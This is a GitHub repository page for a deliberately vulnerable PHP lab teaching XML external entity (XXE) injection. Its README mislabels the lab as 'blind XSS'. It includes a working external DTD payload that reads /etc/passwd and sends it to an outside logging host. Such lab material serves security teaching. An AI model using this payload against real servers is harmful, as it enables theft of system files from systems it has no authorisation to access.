Skip to content

littlecutebird/XXE-Lab

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
exploit
exploit
 
 
img
img
 
 
page
page
 
 
README.md
README.md
 
 
demo.mp4
demo.mp4
 
 
index.php
index.php
 
 

Repository files navigation

A web vulnerable to blind XSS

To run the server:

php -S 127.128.129.130:80

Navigate to Upload and try to upload file student.xml stored in folder exploit. You can rewrite URL to point to your own DTD, something like this:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://longnn.free.beeceptor.com/?x=%file;'>">
%eval;
%exfiltrate;

Then check the response and see the error messages. Something interesting to hacker will display ^^

About

A lab for learning XXE vulnerability

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages